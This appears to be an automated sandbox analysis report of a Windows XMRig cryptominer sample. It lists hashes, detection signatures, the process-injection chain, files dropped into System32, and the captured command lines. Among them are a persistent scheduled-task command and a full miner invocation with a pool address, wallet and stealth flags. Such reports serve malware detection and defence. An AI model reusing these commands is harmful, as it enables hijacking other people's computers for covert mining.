Analysis
- max time kernel: 155s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 14-10-2021 05:08
Static task: static1
Behavioral task: behavioral1
Sample: 342ef4f2941187bdc7f66d148be0ff75.exe
Resource: win7v20210408
General
- Target: 342ef4f2941187bdc7f66d148be0ff75.exe
- Size: 2.1MB
- MD5: 342ef4f2941187bdc7f66d148be0ff75
- SHA1: 7ff601a24c42ec01ef62c097927688a431c5aa76
- SHA256: 046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
- SHA512: 84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
Malware Config
Signatures
- XMRig Miner Payload (3 IoCs)
  Processes:
  resource | yara_rule
  behavioral2/memory/1360-161-0x00000001402F327C-mapping.dmp | xmrig
  behavioral2/memory/1360-160-0x0000000140000000-0x0000000140763000-memory.dmp | xmrig
  behavioral2/memory/1360-164-0x0000000140000000-0x0000000140763000-memory.dmp | xmrig
- Blocklisted process makes network request (1 IoC)
  Processes:
  flow | pid | process
  24 | 1360 | cmd.exe
- Executes dropped EXE (2 IoCs)
  Processes:
  pid | process
  2184 | services64.exe
  2392 | sihost64.exe
- Drops file in System32 directory (3 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe
  File created | C:\Windows\system32\services64.exe | conhost.exe
  File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description | pid | process | target process
  PID 3244 set thread context of 1360 | 3244 | conhost.exe | cmd.exe
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid | process
  1452 | conhost.exe
  3244 | conhost.exe (2 entries)
  1360 | cmd.exe (61 entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1452 | conhost.exe
  Token: SeDebugPrivilege | 3244 | conhost.exe
  Token: SeLockMemoryPrivilege | 1360 | cmd.exe (2 entries)
- Suspicious use of WriteProcessMemory (34 IoCs)
  Processes:
  description | pid | process | target process
  PID 2492 wrote to memory of 1452 | 2492 | 342ef4f2941187bdc7f66d148be0ff75.exe | conhost.exe (3 entries)
  PID 1452 wrote to memory of 4008 | 1452 | conhost.exe | cmd.exe (2 entries)
  PID 4008 wrote to memory of 1212 | 4008 | cmd.exe | schtasks.exe (2 entries)
  PID 1452 wrote to memory of 2944 | 1452 | conhost.exe | cmd.exe (2 entries)
  PID 2944 wrote to memory of 2184 | 2944 | cmd.exe | services64.exe (2 entries)
  PID 2184 wrote to memory of 3244 | 2184 | services64.exe | conhost.exe (3 entries)
  PID 3244 wrote to memory of 2392 | 3244 | conhost.exe | sihost64.exe (2 entries)
  PID 3244 wrote to memory of 1360 | 3244 | conhost.exe | cmd.exe (15 entries)
  PID 2392 wrote to memory of 4052 | 2392 | sihost64.exe | conhost.exe (3 entries)
Processes
- (depth 1) C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"
  - Suspicious use of WriteProcessMemory
  - (depth 2) C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\342ef4f2941187bdc7f66d148be0ff75.exe"
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - (depth 3) C:\Windows\System32\cmd.exe
      Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      - Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        - Creates scheduled task(s)
    - (depth 3) C:\Windows\System32\cmd.exe
      Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
      - Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\system32\services64.exe
        Command line: C:\Windows\system32\services64.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        - (depth 5) C:\Windows\System32\conhost.exe
          Command line: "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"
          - Drops file in System32 directory
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - (depth 6) C:\Windows\system32\Microsoft\Libs\sihost64.exe
            Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            - (depth 7) C:\Windows\System32\conhost.exe
              Command line: "C:\Windows\System32\\conhost.exe" "/sihost64"
          - (depth 6) C:\Windows\System32\cmd.exe
            Command line: C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=bandit --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
- C:\Windows\System32\Microsoft\Libs\sihost64.exe
  MD5: 9eb9be816f6263b25bee3aa6038f58f9
  SHA1: 6c3ddf1e31c349515ea2bb7e417e888077bcdfec
  SHA256: eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e
  SHA512: 441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff
- C:\Windows\System32\services64.exe
  MD5: 342ef4f2941187bdc7f66d148be0ff75
  SHA1: 7ff601a24c42ec01ef62c097927688a431c5aa76
  SHA256: 046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
  SHA512: 84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
- C:\Windows\system32\Microsoft\Libs\sihost64.exe
  MD5: 9eb9be816f6263b25bee3aa6038f58f9
  SHA1: 6c3ddf1e31c349515ea2bb7e417e888077bcdfec
  SHA256: eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e
  SHA512: 441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff
- C:\Windows\system32\services64.exe
  MD5: 342ef4f2941187bdc7f66d148be0ff75
  SHA1: 7ff601a24c42ec01ef62c097927688a431c5aa76
  SHA256: 046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395
  SHA512: 84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2
- memory/1212-133-0x0000000000000000-mapping.dmp
- memory/1360-180-0x00000151E63D0000-0x00000151E63F0000-memory.dmp (Filesize: 128KB)
- memory/1360-164-0x0000000140000000-0x0000000140763000-memory.dmp (Filesize: 7.4MB)
- memory/1360-161-0x00000001402F327C-mapping.dmp
- memory/1360-160-0x0000000140000000-0x0000000140763000-memory.dmp (Filesize: 7.4MB)
- memory/1360-163-0x00000151E4A00000-0x00000151E4A20000-memory.dmp (Filesize: 128KB)
- memory/1360-166-0x00000151E4A30000-0x00000151E4A32000-memory.dmp (Filesize: 8KB)
- memory/1360-165-0x00000151E4A30000-0x00000151E4A32000-memory.dmp (Filesize: 8KB)
- memory/1360-181-0x00000151E63F0000-0x00000151E6410000-memory.dmp (Filesize: 128KB)
- memory/1360-167-0x00000151E4A40000-0x00000151E4A60000-memory.dmp (Filesize: 128KB)
- memory/1452-128-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-123-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-115-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-121-0x000001D851410000-0x000001D85161C000-memory.dmp (Filesize: 2.0MB)
- memory/1452-116-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-118-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-135-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-117-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-119-0x000001D86BDF0000-0x000001D86BFF8000-memory.dmp (Filesize: 2.0MB)
- memory/1452-127-0x000001D853240000-0x000001D853242000-memory.dmp (Filesize: 8KB)
- memory/1452-122-0x000001D853290000-0x000001D853292000-memory.dmp (Filesize: 8KB)
- memory/1452-126-0x000001D8532C0000-0x000001D8532C1000-memory.dmp (Filesize: 4KB)
- memory/1452-124-0x000001D853293000-0x000001D853295000-memory.dmp (Filesize: 8KB)
- memory/1452-125-0x000001D853296000-0x000001D853297000-memory.dmp (Filesize: 4KB)
- memory/2184-136-0x0000000000000000-mapping.dmp
- memory/2392-156-0x0000000000000000-mapping.dmp
- memory/2944-134-0x0000000000000000-mapping.dmp
- memory/3244-148-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-150-0x00000249538D3000-0x00000249538D5000-memory.dmp (Filesize: 8KB)
- memory/3244-159-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-151-0x00000249538D6000-0x00000249538D7000-memory.dmp (Filesize: 4KB)
- memory/3244-162-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-149-0x00000249538D0000-0x00000249538D2000-memory.dmp (Filesize: 8KB)
- memory/3244-140-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-146-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-143-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-142-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-141-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/3244-152-0x0000024939570000-0x0000024939572000-memory.dmp (Filesize: 8KB)
- memory/4008-132-0x0000000000000000-mapping.dmp
- memory/4052-169-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)
- memory/4052-171-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)
- memory/4052-173-0x0000022ABFF90000-0x0000022ABFF96000-memory.dmp (Filesize: 24KB)
- memory/4052-175-0x0000022ADA380000-0x0000022ADA382000-memory.dmp (Filesize: 8KB)
- memory/4052-177-0x0000022ADA383000-0x0000022ADA385000-memory.dmp (Filesize: 8KB)
- memory/4052-176-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)
- memory/4052-172-0x0000022AC1A00000-0x0000022AC1A02000-memory.dmp (Filesize: 8KB)
- memory/4052-178-0x0000022ADA386000-0x0000022ADA387000-memory.dmp (Filesize: 4KB)
- memory/4052-179-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)
- memory/4052-170-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)
- memory/4052-168-0x0000022AC19D0000-0x0000022AC19D2000-memory.dmp (Filesize: 8KB)